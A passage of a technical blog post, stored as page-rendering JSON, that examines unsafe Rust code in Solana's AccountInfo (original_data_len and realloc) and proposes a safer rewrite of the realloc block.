from the runtime. This happened to be next to where the pubkey was stored, which resulted in the creation of ",{"type":25,"tag":162,"props":21264,"children":21267},{"href":21265,"rel":21266},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#74-85",[166],[21268],{"type":31,"value":21269},"this function",{"type":31,"value":1472},{"type":25,"tag":206,"props":21272,"children":21274},{"className":6915,"code":21273,"language":6914,"meta":7,"style":7},"/// Return the account's original data length when it was serialized for the\n/// current program invocation.\n///\n/// # Safety\n///\n/// This method assumes that the original data length was serialized as a u32\n/// integer in the 4 bytes immediately preceding the serialized account key.\npub unsafe fn original_data_len(&self) -> usize {\n    let key_ptr = self.key as *const _ as *const u8;\n    let original_data_len_ptr = key_ptr.offset(-4) as *const u32;\n    *original_data_len_ptr as usize\n}\n",[21275],{"type":25,"tag":82,"props":21276,"children":21277},{"__ignoreMap":7},[21278,21286,21294,21302,21310,21317,21325,21333,21381,21446,21512,21533],{"type":25,"tag":216,"props":21279,"children":21280},{"class":6922,"line":6923},[21281],{"type":25,"tag":216,"props":21282,"children":21283},{"style":6927},[21284],{"type":31,"value":21285},"/// Return the account's original data length when it was serialized for the\n",{"type":25,"tag":216,"props":21287,"children":21288},{"class":6922,"line":6769},[21289],{"type":25,"tag":216,"props":21290,"children":21291},{"style":6927},[21292],{"type":31,"value":21293},"/// current program invocation.\n",{"type":25,"tag":216,"props":21295,"children":21296},{"class":6922,"line":6778},[21297],{"type":25,"tag":216,"props":21298,"children":21299},{"style":6927},[21300],{"type":31,"value":21301},"///\n",{"type":25,"tag":216,"props":21303,"children":21304},{"class":6922,"line":7005},[21305],{"type":25,"tag":216,"props":21306,"children":21307},{"style":6927},[21308],{"type":31,"value":21309},"/// # Safety\n",{"type":25,"tag":216,"props":21311,"children":21312},{"class":6922,"line":7110},[21313],{"type":25,"tag":216,"props":21314,"children":21315},{"style":6927},[21316],{"type":31,"value":21301},{"type":25,"tag":216,"props":21318,"children":21319},{"class":6922,"line":7216},[21320],{"type":25,"tag":216,"props":21321,"children":21322},{"style":6927},[21323],{"type":31,"value":21324},"/// This method assumes that the original data length was serialized as a u32\n",{"type":25,"tag":216,"props":21326,"children":21327},{"class":6922,"line":7244},[21328],{"type":25,"tag":216,"props":21329,"children":21330},{"style":6927},[21331],{"type":31,"value":21332},"/// integer in the 4 bytes immediately preceding the serialized account key.\n",{"type":25,"tag":216,"props":21334,"children":21335},{"class":6922,"line":7257},[21336,21340,21344,21348,21353,21357,21361,21365,21369,21373,21377],{"type":25,"tag":216,"props":21337,"children":21338},{"style":6936},[21339],{"type":31,"value":17647},{"type":25,"tag":216,"props":21341,"children":21342},{"style":6936},[21343],{"type":31,"value":18547},{"type":25,"tag":216,"props":21345,"children":21346},{"style":6936},[21347],{"type":31,"value":17652},{"type":25,"tag":216,"props":21349,"children":21350},{"style":7047},[21351],{"type":31,"value":21352}," original_data_len",{"type":25,"tag":216,"props":21354,"children":21355},{"style":6964},[21356],{"type":31,"value":1850},{"type":25,"tag":216,"props":21358,"children":21359},{"style":6953},[21360],{"type":31,"value":7059},{"type":25,"tag":216,"props":21362,"children":21363},{"style":6936},[21364],{"type":31,"value":17670},{"type":25,"tag":216,"props":21366,"children":21367},{"style":6964},[21368],{"type":31,"value":7036},{"type":25,"tag":216,"props":21370,"children":21371},{"style":6953},[21372],{"type":31,"value":17714},{"type":25,"tag":216,"props":21374,"children":21375},{"style":7375},[21376],{"type":31,"value":17688},{"type":25,"tag":216,"props":21378,"children":21379},{"style":6964},[21380],{"type":31,"value":7241},{"type":25,"tag":216,"props":21382,"children":21383},{"class":6922,"line":7275},[21384,21388,21393,21397,21401,21405,21410,21414,21418,21422,21426,21430,21434,21438,21442],{"type":25,"tag":216,"props":21385,"children":21386},{"style":6936},[21387],{"type":31,"value":6939},{"type":25,"tag":216,"props":21389,"children":21390},{"style":6947},[21391],{"type":31,"value":21392}," key_ptr",{"type":25,"tag":216,"props":21394,"children":21395},{"style":6953},[21396],{"type":31,"value":6956},{"type":25,"tag":216,"props":21398,"children":21399},{"style":6936},[21400],{"type":31,"value":17754},{"type":25,"tag":216,"props":21402,"children":21403},{"style":6953},[21404],{"type":31,"value":179},{"type":25,"tag":216,"props":21406,"children":21407},{"style":6964},[21408],{"type":31,"value":21409},"key ",{"type":25,"tag":216,"props":21411,"children":21412},{"style":6936},[21413],{"type":31,"value":12795},{"type":25,"tag":216,"props":21415,"children":21416},{"style":6953},[21417],{"type":31,"value":13773},{"type":25,"tag":216,"props":21419,"children":21420},{"style":6936},[21421],{"type":31,"value":13611},{"type":25,"tag":216,"props":21423,"children":21424},{"style":6947},[21425],{"type":31,"value":6981},{"type":25,"tag":216,"props":21427,"children":21428},{"style":6936},[21429],{"type":31,"value":12781},{"type":25,"tag":216,"props":21431,"children":21432},{"style":6953},[21433],{"type":31,"value":13773},{"type":25,"tag":216,"props":21435,"children":21436},{"style":6936},[21437],{"type":31,"value":13611},{"type":25,"tag":216,"props":21439,"children":21440},{"style":7375},[21441],{"type":31,"value":18591},{"type":25,"tag":216,"props":21443,"children":21444},{"style":6964},[21445],{"type":31,"value":6967},{"type":25,"tag":216,"props":21447,"children":21448},{"class":6922,"line":7296},[21449,21453,21458,21462,21466,21470,21474,21478,21482,21487,21491,21495,21499,21503,21508],{"type":25,"tag":216,"props":21450,"children":21451},{"style":6936},[21452],{"type":31,"value":6939},{"type":25,"tag":216,"props":21454,"children":21455},{"style":6947},[21456],{"type":31,"value":21457}," original_data_len_ptr",{"type":25,"tag":216,"props":21459,"children":21460},{"style":6953},[21461],{"type":31,"value":6956},{"type":25,"tag":216,"props":21463,"children":21464},{"style":6947},[21465],{"type":31,"value":21392},{"type":25,"tag":216,"props":21467,"children":21468},{"style":6953},[21469],{"type":31,"value":179},{"type":25,"tag":216,"props":21471,"children":21472},{"style":7047},[21473],{"type":31,"value":17858},{"type":25,"tag":216,"props":21475,"children":21476},{"style":6964},[21477],{"type":31,"value":1850},{"type":25,"tag":216,"props":21479,"children":21480},{"style":6953},[21481],{"type":31,"value":8276},{"type":25,"tag":216,"props":21483,"children":21484},{"style":6989},[21485],{"type":31,"value":21486},"4",{"type":25,"tag":216,"props":21488,"children":21489},{"style":6964},[21490],{"type":31,"value":7036},{"type":25,"tag":216,"props":21492,"children":21493},{"style":6936},[21494],{"type":31,"value":12795},{"type":25,"tag":216,"props":21496,"children":21497},{"style":6953},[21498],{"type":31,"value":13773},{"type":25,"tag":216,"props":21500,"children":21501},{"style":6936},[21502],{"type":31,"value":13611},{"type":25,"tag":216,"props":21504,"children":21505},{"style":7375},[21506],{"type":31,"value":21507}," u32",{"type":25,"tag":216,"props":21509,"children":21510},{"style":6964},[21511],{"type":31,"value":6967},{"type":25,"tag":216,"props":21513,"children":21514},{"class":6922,"line":7305},[21515,21520,21525,21529],{"type":25,"tag":216,"props":21516,"children":21517},{"style":6953},[21518],{"type":31,"value":21519},"    *",{"type":25,"tag":216,"props":21521,"children":21522},{"style":6947},[21523],{"type":31,"value":21524},"original_data_len_ptr",{"type":25,"tag":216,"props":21526,"children":21527},{"style":6936},[21528],{"type":31,"value":12781},{"type":25,"tag":216,"props":21530,"children":21531},{"style":7375},[21532],{"type":31,"value":20932},{"type":25,"tag":216,"props":21534,"children":21535},{"class":6922,"line":7557},[21536],{"type":25,"tag":216,"props":21537,"children":21538},{"style":6964},[21539],{"type":31,"value":7874},{"type":25,"tag":38,"props":21541,"children":21542},{},[21543,21545,21550,21552,21557,21559,21564,21566,21571,21573,21580,21582,21589,21590,21597,21598,21605,21606,21613],{"type":31,"value":21544},"It's marked ",{"type":25,"tag":82,"props":21546,"children":21548},{"className":21547},[],[21549],{"type":31,"value":18313},{"type":31,"value":21551},", properly documented, but there's just one problem: we need this for ",{"type":25,"tag":82,"props":21553,"children":21555},{"className":21554},[],[21556],{"type":31,"value":17595},{"type":31,"value":21558},", which originally was not ",{"type":25,"tag":82,"props":21560,"children":21562},{"className":21561},[],[21563],{"type":31,"value":18313},{"type":31,"value":21565},". So, in the name of not breaking API compatibility, the Solana team just threw the call in an ",{"type":25,"tag":82,"props":21567,"children":21569},{"className":21568},[],[21570],{"type":31,"value":18313},{"type":31,"value":21572}," block and added ",{"type":25,"tag":162,"props":21574,"children":21577},{"href":21575,"rel":21576},"https://docs.rs/solana-program/1.10.30/solana_program/account_info/struct.AccountInfo.html#safety-1",[166],[21578],{"type":31,"value":21579},"a doc comment",{"type":31,"value":21581}," - adding to the ",{"type":25,"tag":162,"props":21583,"children":21586},{"href":21584,"rel":21585},"https://docs.rs/solana-program/1.10.30/solana_program/program/fn.invoke_signed_unchecked.html#safety",[166],[21587],{"type":31,"value":21588},"small",{"type":31,"value":10409},{"type":25,"tag":162,"props":21591,"children":21594},{"href":21592,"rel":21593},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcpy.html#safety",[166],[21595],{"type":31,"value":21596},"pile",{"type":31,"value":10409},{"type":25,"tag":162,"props":21599,"children":21602},{"href":21600,"rel":21601},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memset.html#safety",[166],[21603],{"type":31,"value":21604},"of",{"type":31,"value":10409},{"type":25,"tag":162,"props":21607,"children":21610},{"href":21608,"rel":21609},"https://docs.rs/solana-program/1.11.2/solana_program/program_memory/fn.sol_memcmp.html#safety",[166],[21611],{"type":31,"value":21612},"functions",{"type":31,"value":21614}," that are actually unsafe but aren't marked as such for API compatibility reasons (and the last three - all related to each other - don't even have the comment until version 1.11, which isn't even on mainnet as of the time of writing).",{"type":25,"tag":26,"props":21616,"children":21618},{"id":21617},"towards-safer-unsafe",[21619,21621],{"type":31,"value":21620},"Towards safer ",{"type":25,"tag":82,"props":21622,"children":21624},{"className":21623},[],[21625],{"type":31,"value":18313},{"type":25,"tag":38,"props":21627,"children":21628},{},[21629,21631,21636,21638,21643,21645,21652],{"type":31,"value":21630},"Let's circle back to that main ",{"type":25,"tag":82,"props":21632,"children":21634},{"className":21633},[],[21635],{"type":31,"value":18313},{"type":31,"value":21637}," block inside ",{"type":25,"tag":82,"props":21639,"children":21641},{"className":21640},[],[21642],{"type":31,"value":17595},{"type":31,"value":21644}," for a bit, shall we? As a reminder, it looks like ",{"type":25,"tag":162,"props":21646,"children":21649},{"href":21647,"rel":21648},"https://docs.rs/solana-program/1.10.28/src/solana_program/account_info.rs.html#127-136",[166],[21650],{"type":31,"value":21651},"this",{"type":31,"value":1472},{"type":25,"tag":206,"props":21654,"children":21656},{"className":6915,"code":21655,"language":6914,"meta":7,"style":7},"// realloc\nunsafe {\n    // First set new length in the serialized data\n    let ptr = self.try_borrow_mut_data()?.as_mut_ptr().offset(-8) as *mut u64;\n    *ptr = new_len as u64;\n\n    // Then set the new length in the local slice\n    let ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n    *ptr = new_len as u64;\n}\n",[21657],{"type":25,"tag":82,"props":21658,"children":21659},{"__ignoreMap":7},[21660,21668,21679,21687,21774,21805,21812,21820,21947,21978],{"type":25,"tag":216,"props":21661,"children":21662},{"class":6922,"line":6923},[21663],{"type":25,"tag":216,"props":21664,"children":21665},{"style":6927},[21666],{"type":31,"value":21667},"// realloc\n",{"type":25,"tag":216,"props":21669,"children":21670},{"class":6922,"line":6769},[21671,21675],{"type":25,"tag":216,"props":21672,"children":21673},{"style":6936},[21674],{"type":31,"value":18313},{"type":25,"tag":216,"props":21676,"children":21677},{"style":6964},[21678],{"type":31,"value":7241},{"type":25,"tag":216,"props":21680,"children":21681},{"class":6922,"line":6778},[21682],{"type":25,"tag":216,"props":21683,"children":21684},{"style":6927},[21685],{"type":31,"value":21686},"    // First set new length in the serialized data\n",{"type":25,"tag":216,"props":21688,"children":21689},{"class":6922,"line":7005},[21690,21694,21698,21702,21706,21710,21714,21718,21722,21726,21730,21734,21738,21742,21746,21750,21754,21758,21762,21766,21770],{"type":25,"tag":216,"props":21691,"children":21692},{"style":6936},[21693],{"type":31,"value":6939},{"type":25,"tag":216,"props":21695,"children":21696},{"style":6947},[21697],{"type":31,"value":17814},{"type":25,"tag":216,"props":21699,"children":21700},{"style":6953},[21701],{"type":31,"value":6956},{"type":25,"tag":216,"props":21703,"children":21704},{"style":6936},[21705],{"type":31,"value":17754},{"type":25,"tag":216,"props":21707,"children":21708},{"style":6953},[21709],{"type":31,"value":179},{"type":25,"tag":216,"props":21711,"children":21712},{"style":7047},[21713],{"type":31,"value":17831},{"type":25,"tag":216,"props":21715,"children":21716},{"style":6964},[21717],{"type":31,"value":17836},{"type":25,"tag":216,"props":21719,"children":21720},{"style":6953},[21721],{"type":31,"value":7081},{"type":25,"tag":216,"props":21723,"children":21724},{"style":7047},[21725],{"type":31,"value":17845},{"type":25,"tag":216,"props":21727,"children":21728},{"style":6964},[21729],{"type":31,"value":17836},{"type":25,"tag":216,"props":21731,"children":21732},{"style":6953},[21733],{"type":31,"value":179},{"type":25,"tag":216,"props":21735,"children":21736},{"style":7047},[21737],{"type":31,"value":17858},{"type":25,"tag":216,"props":21739,"children":21740},{"style":6964},[21741],{"type":31,"value":1850},{"type":25,"tag":216,"props":21743,"children":21744},{"style":6953},[21745],{"type":31,"value":8276},{"type":25,"tag":216,"props":21747,"children":21748},{"style":6989},[21749],{"type":31,"value":8031},{"type":25,"tag":216,"props":21751,"children":21752},{"style":6964},[21753],{"type":31,"value":7036},{"type":25,"tag":216,"props":21755,"children":21756},{"style":6936},[21757],{"type":31,"value":12795},{"type":25,"tag":216,"props":21759,"children":21760},{"style":6953},[21761],{"type":31,"value":13773},{"type":25,"tag":216,"props":21763,"children":21764},{"style":6936},[21765],{"type":31,"value":7691},{"type":25,"tag":216,"props":21767,"children":21768},{"style":7375},[21769],{"type":31,"value":9811},{"type":25,"tag":216,"props":21771,"children":21772},{"style":6964},[21773],{"type":31,"value":6967},{"type":25,"tag":216,"props":21775,"children":21776},{"class":6922,"line":7110},[21777,21781,21785,21789,21793,21797,21801],{"type":25,"tag":216,"props":21778,"children":21779},{"style":6953},[21780],{"type":31,"value":21519},{"type":25,"tag":216,"props":21782,"children":21783},{"style":6947},[21784],{"type":31,"value":17906},{"type":25,"tag":216,"props":21786,"children":21787},{"style":6953},[21788],{"type":31,"value":6956},{"type":25,"tag":216,"props":21790,"children":21791},{"style":6947},[21792],{"type":31,"value":17915},{"type":25,"tag":216,"props":21794,"children":21795},{"style":6936},[21796],{"type":31,"value":12781},{"type":25,"tag":216,"props":21798,"children":21799},{"style":7375},[21800],{"type":31,"value":9811},{"type":25,"tag":216,"props":21802,"children":21803},{"style":6964},[21804],{"type":31,"value":6967},{"type":25,"tag":216,"props":21806,"children":21807},{"class":6922,"line":7216},[21808],{"type":25,"tag":216,"props":21809,"children":21810},{"emptyLinePlaceholder":16},[21811],{"type":31,"value":7642},{"type":25,"tag":216,"props":21813,"children":21814},{"class":6922,"line":7244},[21815],{"type":25,"tag":216,"props":21816,"children":21817},{"style":6927},[21818],{"type":31,"value":21819},"    // Then set the new length in the local slice\n",{"type":25,"tag":216,"props":21821,"children":21822},{"class":6922,"line":7257},[21823,21827,21831,21835,21839,21843,21847,21851,21855,21859,21863,21867,21871,21875,21879,21883,21887,21891,21895,21899,21903,21907,21911,21915,21919,21923,21927,21931,21935,21939,21943],{"type":25,"tag":216,"props":21824,"children":21825},{"style":6936},[21826],{"type":31,"value":6939},{"type":25,"tag":216,"props":21828,"children":21829},{"style":6947},[21830],{"type":31,"value":17814},{"type":25,"tag":216,"props":21832,"children":21833},{"style":6953},[21834],{"type":31,"value":6956},{"type":25,"tag":216,"props":21836,"children":21837},{"style":6953},[21838],{"type":31,"value":11093},{"type":25,"tag":216,"props":21840,"children":21841},{"style":6936},[21842],{"type":31,"value":7691},{"type":25,"tag":216,"props":21844,"children":21845},{"style":6953},[21846],{"type":31,"value":13773},{"type":25,"tag":216,"props":21848,"children":21849},{"style":6964},[21850],{"type":31,"value":17974},{"type":25,"tag":216,"props":21852,"children":21853},{"style":6936},[21854],{"type":31,"value":17670},{"type":25,"tag":216,"props":21856,"children":21857},{"style":6953},[21858],{"type":31,"value":179},{"type":25,"tag":216,"props":21860,"children":21861},{"style":6964},[21862],{"type":31,"value":7669},{"type":25,"tag":216,"props":21864,"children":21865},{"style":6953},[21866],{"type":31,"value":179},{"type":25,"tag":216,"props":21868,"children":21869},{"style":7047},[21870],{"type":31,"value":17995},{"type":25,"tag":216,"props":21872,"children":21873},{"style":6964},[21874],{"type":31,"value":18000},{"type":25,"tag":216,"props":21876,"children":21877},{"style":6936},[21878],{"type":31,"value":12795},{"type":25,"tag":216,"props":21880,"children":21881},{"style":6953},[21882],{"type":31,"value":13773},{"type":25,"tag":216,"props":21884,"children":21885},{"style":6936},[21886],{"type":31,"value":13611},{"type":25,"tag":216,"props":21888,"children":21889},{"style":7375},[21890],{"type":31,"value":9811},{"type":25,"tag":216,"props":21892,"children":21893},{"style":6964},[21894],{"type":31,"value":1888},{"type":25,"tag":216,"props":21896,"children":21897},{"style":6953},[21898],{"type":31,"value":179},{"type":25,"tag":216,"props":21900,"children":21901},{"style":7047},[21902],{"type":31,"value":17858},{"type":25,"tag":216,"props":21904,"children":21905},{"style":6964},[21906],{"type":31,"value":1850},{"type":25,"tag":216,"props":21908,"children":21909},{"style":6989},[21910],{"type":31,"value":184},{"type":25,"tag":216,"props":21912,"children":21913},{"style":6964},[21914],{"type":31,"value":7036},{"type":25,"tag":216,"props":21916,"children":21917},{"style":6936},[21918],{"type":31,"value":12795},{"type":25,"tag":216,"props":21920,"children":21921},{"style":7375},[21922],{"type":31,"value":9811},{"type":25,"tag":216,"props":21924,"children":21925},{"style":6964},[21926],{"type":31,"value":7036},{"type":25,"tag":216,"props":21928,"children":21929},{"style":6936},[21930],{"type":31,"value":12795},{"type":25,"tag":216,"props":21932,"children":21933},{"style":6953},[21934],{"type":31,"value":13773},{"type":25,"tag":216,"props":21936,"children":21937},{"style":6936},[21938],{"type":31,"value":7691},{"type":25,"tag":216,"props":21940,"children":21941},{"style":7375},[21942],{"type":31,"value":9811},{"type":25,"tag":216,"props":21944,"children":21945},{"style":6964},[21946],{"type":31,"value":7797},{"type":25,"tag":216,"props":21948,"children":21949},{"class":6922,"line":7275},[21950,21954,21958,21962,21966,21970,21974],{"type":25,"tag":216,"props":21951,"children":21952},{"style":6953},[21953],{"type":31,"value":21519},{"type":25,"tag":216,"props":21955,"children":21956},{"style":6947},[21957],{"type":31,"value":17906},{"type":25,"tag":216,"props":21959,"children":21960},{"style":6953},[21961],{"type":31,"value":6956},{"type":25,"tag":216,"props":21963,"children":21964},{"style":6947},[21965],{"type":31,"value":17915},{"type":25,"tag":216,"props":21967,"children":21968},{"style":6936},[21969],{"type":31,"value":12781},{"type":25,"tag":216,"props":21971,"children":21972},{"style":7375},[21973],{"type":31,"value":9811},{"type":25,"tag":216,"props":21975,"children":21976},{"style":6964},[21977],{"type":31,"value":6967},{"type":25,"tag":216,"props":21979,"children":21980},{"class":6922,"line":7296},[21981],{"type":25,"tag":216,"props":21982,"children":21983},{"style":6964},[21984],{"type":31,"value":7874},{"type":25,"tag":38,"props":21986,"children":21987},{},[21988,21990,21995],{"type":31,"value":21989},"We've seen how we could have ran into all sorts of issues here, with the usage of slice layout details, the reborrow creating an unbounded lifetime, and the ",{"type":25,"tag":82,"props":21991,"children":21993},{"className":21992},[],[21994],{"type":31,"value":19461},{"type":31,"value":21996}," borrow not accurately representing the actual usage of its contents. We can do better than this.",{"type":25,"tag":38,"props":21998,"children":21999},{},[22000,22002,22007,22009,22014,22016,22021,22023,22028,22030,22035,22037,22043,22045,22055,22057,22068],{"type":31,"value":22001},"First, let's deal with the ",{"type":25,"tag":82,"props":22003,"children":22005},{"className":22004},[],[22006],{"type":31,"value":19461},{"type":31,"value":22008}," borrowing issue. When we ",{"type":25,"tag":82,"props":22010,"children":22012},{"className":22011},[],[22013],{"type":31,"value":17831},{"type":31,"value":22015},", we get a ",{"type":25,"tag":82,"props":22017,"children":22019},{"className":22018},[],[22020],{"type":31,"value":20699},{"type":31,"value":22022}," back, which represents our borrow of the ",{"type":25,"tag":82,"props":22024,"children":22026},{"className":22025},[],[22027],{"type":31,"value":19461},{"type":31,"value":22029},"'s data. The fix here is simple: keep that ",{"type":25,"tag":82,"props":22031,"children":22033},{"className":22032},[],[22034],{"type":31,"value":20699},{"type":31,"value":22036}," around and use it to access the data, instead of using ",{"type":25,"tag":82,"props":22038,"children":22040},{"className":22039},[],[22041],{"type":31,"value":22042},"RefCell::as_ptr",{"type":31,"value":22044},". Next, the slice; again, the fix is simple. Instead of attempting to modify just the length field, and resorting to using layout information to do so since Rust slices are immutable, we can simply construct a new slice reference and set that. The Rust compiler",{"type":25,"tag":19431,"props":22046,"children":22047},{},[22048],{"type":25,"tag":162,"props":22049,"children":22053},{"href":22050,"ariaDescribedBy":22051,"dataFootnoteRef":7,"id":22052},"#user-content-fn-rustc-llvm",[19438],"user-content-fnref-rustc-llvm",[22054],{"type":31,"value":21486},{"type":31,"value":22056}," is smart enough to realize that the only thing changing is the length field, and so only emits the code to set the length",{"type":25,"tag":19431,"props":22058,"children":22059},{},[22060],{"type":25,"tag":162,"props":22061,"children":22065},{"href":22062,"ariaDescribedBy":22063,"dataFootnoteRef":7,"id":22064},"#user-content-fn-godbolt",[19438],"user-content-fnref-godbolt",[22066],{"type":31,"value":22067},"5",{"type":31,"value":22069},". So then we get:",{"type":25,"tag":206,"props":22071,"children":22073},{"className":6915,"code":22072,"language":6914,"meta":7,"style":7},"let mut slice = self.try_borrow_mut_data()?;\n\n// First set new length in the serialized data\nlet ptr = unsafe { slice.as_mut_ptr().offset(-8) } as *mut u64;\nunsafe { *ptr = new_len as u64 };\n\n// Then set the new length in the local slice\n*slice = unsafe { std::slice::from_raw_parts_mut(slice.as_mut_ptr(), new_len) };\n",[22074],{"type":25,"tag":82,"props":22075,"children":22076},{"__ignoreMap":7},[22077,22121,22128,22135,22219,22259,22266,22273],{"type":25,"tag":216,"props":22078,"children":22079},{"class":6922,"line":6923},[22080,22084,22088,22093,22097,22101,22105,22109,22113,22117],{"type":25,"tag":216,"props":22081,"children":22082},{"style":6936},[22083],{"type":31,"value":15743},{"type":25,"tag":216,"props":22085,"children":22086},{"style":6936},[22087],{"type":31,"value":6944},{"type":25,"tag":216,"props":22089,"children":22090},{"style":6947},[22091],{"type":31,"value":22092}," slice",{"type":25,"tag":216,"props":22094,"children":22095},{"style":6953},[22096],{"type":31,"value":6956},{"type":25,"tag":216,"props":22098,"children":22099},{"style":6936},[22100],{"type":31,"value":17754},{"type":25,"tag":216,"props":22102,"children":22103},{"style":6953},[22104],{"type":31,"value":179},{"type":25,"tag":216,"props":22106,"children":22107},{"style":7047},[22108],{"type":31,"value":17831},{"type":25,"tag":216,"props":22110,"children":22111},{"style":6964},[22112],{"type":31,"value":17836},{"type":25,"tag":216,"props":22114,"children":22115},{"style":6953},[22116],{"type":31,"value":604},{"type":25,"tag":216,"props":22118,"children":22119},{"style":6964},[22120],{"type":31,"value":6967},{"type":25,"tag":216,"props":22122,"children":22123},{"class":6922,"line":6769},[22124],{"type":25,"tag":216,"props":22125,"children":22126},{"emptyLinePlaceholder":16},[22127],{"type":31,"value":7642},{"type":25,"tag":216,"props":22129,"children":22130},{"class":6922,"line":6778},[22131],{"type":25,"tag":216,"props":22132,"children":22133},{"style":6927},[22134],{"type":31,"value":18360},{"type":25,"tag":216,"props":22136,"children":22137},{"class":6922,"line":7005},[22138,22142,22146,22150,22154,22158,22162,22166,22170,22174,22178,22182,22186,22190,22194,22199,22203,22207,22211,22215],{"type":25,"tag":216,"props":22139,"children":22140},{"style":6936},[22141],{"type":31,"value":15743},{"type":25,"tag":216,"props":22143,"children":22144},{"style":6947},[22145],{"type":31,"value":17814},{"type":25,"tag":216,"props":22147,"children":22148},{"style":6953},[22149],{"type":31,"value":6956},{"type":25,"tag":216,"props":22151,"children":22152},{"style":6936},[22153],{"type":31,"value":18547},{"type":25,"tag":216,"props":22155,"children":22156},{"style":6964},[22157],{"type":31,"value":13542},{"type":25,"tag":216,"props":22159,"children":22160},{"style":6947},[22161],{"type":31,"value":19270},{"type":25,"tag":216,"props":22163,"children":22164},{"style":6953},[22165],{"type":31,"value":179},{"type":25,"tag":216,"props":22167,"children":22168},{"style":7047},[22169],{"type":31,"value":17845},{"type":25,"tag":216,"props":22171,"children":22172},{"style":6964},[22173],{"type":31,"value":17836},{"type":25,"tag":216,"props":22175,"children":22176},{"style":6953},[22177],{"type":31,"value":179},{"type":25,"tag":216,"props":22179,"children":22180},{"style":7047},[22181],{"type":31,"value":17858},{"type":25,"tag":216,"props":22183,"children":22184},{"style":6964},[22185],{"type":31,"value":1850},{"type":25,"tag":216,"props":22187,"children":22188},{"style":6953},[22189],{"type":31,"value":8276},{"type":25,"tag":216,"props":22191,"children":22192},{"style":6989},[22193],{"type":31,"value":8031},{"type":25,"tag":216,"props":22195,"children":22196},{"style":6964},[22197],{"type":31,"value":22198},") } ",{"type":25,"tag":216,"props":22200,"children":22201},{"style":6936},[22202],{"type":31,"value":12795},{"type":25,"tag":216,"props":22204,"children":22205},{"style":6953},[22206],{"type":31,"value":13773},{"type":25,"tag":216,"props":22208,"children":22209},{"style":6936},[22210],{"type":31,"value":7691},{"type":25,"tag":216,"props":22212,"children":22213},{"style":7375},[22214],{"type":31,"value":9811},{"type":25,"tag":216,"props":22216,"children":22217},{"style":6964},[22218],{"type":31,"value":6967},{"type":25,"tag":216,"props":22220,"children":22221},{"class":6922,"line":7110},[22222,22226,22230,22234,22238,22242,22246,22250,22254],{"type":25,"tag":216,"props":22223,"children":22224},{"style":6936},[22225],{"type":31,"value":18313},{"type":25,"tag":216,"props":22227,"children":22228},{"style":6964},[22229],{"type":31,"value":13542},{"type":25,"tag":216,"props":22231,"children":22232},{"style":6953},[22233],{"type":31,"value":8519},{"type":25,"tag":216,"props":22235,"children":22236},{"style":6947},[22237],{"type":31,"value":17906},{"type":25,"tag":216,"props":22239,"children":22240},{"style":6953},[22241],{"type":31,"value":6956},{"type":25,"tag":216,"props":22243,"children":22244},{"style":6947},[22245],{"type":31,"value":17915},{"type":25,"tag":216,"props":22247,"children":22248},{"style":6936},[22249],{"type":31,"value":12781},{"type":25,"tag":216,"props":22251,"children":22252},{"style":7375},[22253],{"type":31,"value":9811},{"type":25,"tag":216,"props":22255,"children":22256},{"style":6964},[22257],{"type":31,"value":22258}," };\n",{"type":25,"tag":216,"props":22260,"children":22261},{"class":6922,"line":7216},[22262],{"type":25,"tag":216,"props":22263,"children":22264},{"emptyLinePlaceholder":16},[22265],{"type":31,"value":7642},{"type":25,"tag":216,"props":22267,"children":22268},{"class":6922,"line":7244},[22269],{"type":25,"tag":216,"props":22270,"children":22271},{"style":6927},[22272],{"type":31,"value":20098},{"type":25,"tag":216,"props":22274,"children":22275},{"class":6922,"line":7257},[22276,22280,22284,22288,22292,22297,22301,22305,22309,22314,22318,22322,22326,22330,22335,22339],{"type":25,"tag":216,"props":22277,"children":22278},{"style":6953},[22279],{"type":31,"value":8519},{"type":25,"tag":216,"props":22281,"children":22282},{"style":6947},[22283],{"type":31,"value":19270},{"type":25,"tag":216,"props":22285,"children":22286},{"style":6953},[22287],{"type":31,"value":6956},{"type":25,"tag":216,"props":22289,"children":22290},{"style":6936},[22291],{"type":31,"value":18547},{"type":25,"tag":216,"props":22293,"children":22294},{"style":6964},[22295],{"type":31,"value":22296}," { std",{"type":25,"tag":216,"props":22298,"children":22299},{"style":6953},[22300],{"type":31,"value":7438},{"type":25,"tag":216,"props":22302,"children":22303},{"style":6964},[22304],{"type":31,"value":19270},{"type":25,"tag":216,"props":22306,"children":22307},{"style":6953},[22308],{"type":31,"value":7438},{"type":25,"tag":216,"props":22310,"children":22311},{"style":7047},[22312],{"type":31,"value":22313},"from_raw_parts_mut",{"type":25,"tag":216,"props":22315,"children":22316},{"style":6964},[22317],{"type":31,"value":1850},{"type":25,"tag":216,"props":22319,"children":22320},{"style":6947},[22321],{"type":31,"value":19270},{"type":25,"tag":216,"props":22323,"children":22324},{"style":6953},[22325],{"type":31,"value":179},{"type":25,"tag":216,"props":22327,"children":22328},{"style":7047},[22329],{"type":31,"value":17845},{"type":25,"tag":216,"props":22331,"children":22332},{"style":6964},[22333],{"type":31,"value":22334},"(), ",{"type":25,"tag":216,"props":22336,"children":22337},{"style":6947},[22338],{"type":31,"value":17679},{"type":25,"tag":216,"props":22340,"children":22341},{"style":6964},[22342],{"type":31,"value":18702},{"type":25,"tag":38,"props":22344,"children":22345},{},[22346,22348,22353,22355,22360,22362,22367,22369],{"type":31,"value":22347},"No more pointer casting except for the one place that actually needs it (since the ABI for the serialized buffer uses a ",{"type":25,"tag":82,"props":22349,"children":22351},{"className":22350},[],[22352],{"type":31,"value":11994},{"type":31,"value":22354}," and not a ",{"type":25,"tag":82,"props":22356,"children":22358},{"className":22357},[],[22359],{"type":31,"value":20560},{"type":31,"value":22361}," for the size field, given that ",{"type":25,"tag":82,"props":22363,"children":22365},{"className":22364},[],[22366],{"type":31,"value":20560},{"type":31,"value":22368}," is architecture-dependent), and no dependency on slice reference 